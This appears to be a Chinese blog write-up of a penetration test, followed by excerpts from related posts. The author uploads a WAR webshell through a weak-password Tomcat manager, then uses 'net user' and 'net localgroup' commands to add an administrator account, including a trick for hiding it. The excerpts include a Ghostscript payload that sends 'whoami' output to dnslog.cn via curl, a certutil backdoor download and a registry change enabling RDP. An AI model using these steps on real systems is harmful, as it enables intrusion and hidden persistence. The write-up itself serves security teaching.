记一次渗透实例

最新推荐文章于 2024-07-09 19:50:48 发布
最新推荐文章于 2024-07-09 19:50:48 发布
阅读量329 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络 安全 渗透测试 文章标签: 网络安全 渗透测试 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HBohan/article/details/118635166
本文记录了一次渗透测试的过程,从发现Tomcat弱口令登录到上传shell.war,成功获取管理员权限。通过创建新用户并加入管理员组,实现了远程登录。虽然过程中没有太多技术难点,但运气与细心是关键。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

访问测试主页时,发现熟悉的tomcat图标,果断进行8080端口访问,进入tomcat默认页面。
在这里插入图片描述
在这里插入图片描述
这里存在弱口令登录问题(用户名:admin,密码:空),登录以后进入管理界面,可以看到tomcat版本号为:6.0.18;操作系统为windows 2003
在这里插入图片描述
注意到这里可以上传war包。上传小马shell.war,尝试访问http://localhost:8080/shell 和http://localhost:8080/shell/shell.jsp

在这里插入图片描述
访问http://localhost:8080/shell/shell.jsp 出现报错500,至此shell已上传成功,使用冰蝎进行连接,发现是管理员账号。
在这里插入图片描述
在这里插入图片描述
至此拿到shell了,可以拿着报告跟项目组拍桌子吼道:你们项目组一个能打的都没有吗(浩哥经典语录)!

远程登录

知道了用户administrator的存在,进行3389端口的远程登录口令暴破,失败告终。
在这里插入图片描述
利用前面我们都拿到的shell,可以创建一个用户进行远程登录嘛

创建用户

net user username password /add
在这里插入图片描述
ps:在用户名后面加上”$”后在命令行使用net user查看所有用户时会隐藏该用户。 将创建的用户加入管理员组 net localgroup Administrators username /add
在这里插入图片描述
现在可以使用创建的用户进行远程登录了
在这里插入图片描述
在这里插入图片描述
至此可以关机回家睡个好觉了。没什么技术难点,关键在于运气很好,哈哈哈。

想学啊你,我教你啊
在这里插入图片描述

渗透实例一次XSS渗透过程
TeamsSix 的 优快云 空间
07-03 2490
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.youkuaiyun.com/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
一次对ouija渗透测试c语言逆向学习
2401_83799022的博客
06-27 1191
潜在的缓冲区溢出:函数中复制用户名到USERNAME_COPY的过程中,没有适当的长度检查,如果USERNAME的长度超过预期,可能会发生缓冲区溢出。潜在的整数溢出:在计算SHORT_USERNAME_LEN时,使用了位运算和强制类型转换,如果LEN_USERNAME的值非常大,可能会引起整数溢出。netstat -tnlp 命令会显示当前系统上所有处于监听状态的 TCP 套接字的详细信息,包括它们的数字形式的地址和端口号,以及关联的进程信息。它涉及用户名长度的检查,并对用户名进行不同的处理。
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
一次渗透测试实战
qq_45434762的博客
11-17 1841
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
一次模拟渗透
0verWatch的博客
07-25 633
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
渗透测试实例
11-22
某些渗透测试实例,没有具体的漏洞利用过程,只是对常见漏洞的一个直观了解
一次零基础靶机渗透细节全程录——Tr0ll
ran的博客
07-12 4428
渗透测试渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
一次零基础 自“信息收集“到“权限维持“的渗透测试全程详细
最新发布
ran的博客
07-09 1079
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。命令:cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip。在渗透测试中,权限维持是非常重要的一步。
一次渗透实战案例思路分享
weixin_54787877的博客
03-22 1294
注 文章来源:“潇湘信安”公众号 0x01 前言 前几天帮朋友搞了一个域,很久没有搞域了感觉都快忘的差不多了,不过还好最终还是打穿了这个域,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!!! 0x02 域渗透思路总结 1.利用Jenkins来进行打点Getshell,默认SYSTEM权限,但是当前主机不能出网,工作组50.1; 2.通过nettat -ano网络连接分析发现这台机器有与其他公网连接,21、443等..
一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 476
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
一次简单的渗透测试
kali_Ma的博客
07-10 2630
前言 之前对渗透这方面的学习一直只是学到了Getshell为止,但是其实渗透可以说Getshell仅仅是一个开端,接下去的还有远程连接,域渗透等领域,这次刚好渗透到了某网站,决定以该网站为例,看看能不能进行一次相对完整的渗透历程 SQL注入 该网站是某校某选课网站,首先先用扫描器扫描一下网站,运气很好,居然扫出了一个注入,一看,原来是个宽字节注入 简单测了一下,发现并没有什么过滤,那就常规操作,用SQLmap跑一下 python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa
一次真实渗透经历
qq_39682037的博客
05-23 4142
背景小编就不多解释了,小编在某站点扫描时,发现其可能存在上传漏洞 小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传 成功上传之后,利用一句话木马进行连接 利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。 例: net user test test /add net localgroup administrators test /add REG ADD HKLM\SYSTEM\CurrentControlSet\Con
一次简单的渗透实战(手工SQL注入)
qq_40467699的博客
09-17 1792
渗透场景: 本次测试网站 :www.gaoneng.com 该漏洞已经提交漏洞盒子平台,已授权公开此漏洞。 经过初步判断,得出此网站操作系统为Windows,网站源码脚本格式为php,使用的数据库类型为Mysql,架设环境为Windows Microsoft-IIS/6.0。 问题描述: 产生SQL注入的必备条件: 1.程序员未经检查或者未经充分检查的用户输入数据,意外变成了代码被执行。 2.有可利用控制输入的数据值 SQL注入漏洞的危害: 1.攻击者可以利用获得的数据进行读取服
一次网站渗透测试
qq_38348692的博客
10-02 1195
在这里把测试站点都127.0.0.1: 1.进行收集: 1)端口信息扫描,没有太大的利用价值 2)发现网站后台:127.0.0.1/admin/login.php 使用万能密钥成功登陆网站后台 2.尝试上传一句话获取网站webshell 文件上传页面进行上传是发现进行了过滤,不能上传php文件,尝试使用burp绕过,发现进行后台验证,不甘心!!!!! 3. 在后台随便翻找,发现一处文件下载...
一次网站的渗透测试
Hacker_DB的博客
04-14 963
朋友叫我帮忙,对一个网站一下测试。主要目标是看看能不能进入服务器,收集一些建站者信息。 朋友平时待我不薄,此时怎可出言拒绝?经过授权后,直接开搞! (情景发生时间距今较久,请各位读者酌情参考) 用扫描器扫了一下,没有发现漏洞。发现网站存在CDN: 看了下历史解析录,还好不多。通过判断,确定最后一条为真实IP: 查看下IP绑定的网站,查到3个域名,其中一个无法访问,另一个是个后台: 我们先来看这个后台: 随便输入一个账号和密码,提示数据不存在: 扫了下目录,只扫出个upl
一次渗透实验题
迷风小白
05-31 3124
添加摘要 0x01 用nmap扫一下发现有一个1433数据库端口和一个8080端口 访问一下8080端口,发现是个登录页面 通过提示要在页面进行信息收集,得到员工姓名:天子,然后用这个姓名登录进行抓包爆破密码 因为只能用虚拟机里的东西,然后选择相应的字典进行爆破。 得到密码:woaini521,登录后台拿到第一个key 要想拿到第二个key...
一次实际站点的渗透
qq_44040833的博客
02-07 559
已经修复了漏洞。在这个小企业站点中,对于没有第三方HTTPS证书的网站我都会去想着看看给个单引号试试。 在这个站点中浏览了一下然后看了看功能指引,很常规的即使到现在2020了都还有的问题,安全防护不好,前段参数不设置过滤 然后依靠天眼查查到了相关的信息 在这个站点的功能中存在一个新闻展示,点击进去发现URL处存在id参数,这个可能会是一个注入点,为了怕网站配备有WAF,直接依靠sho...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值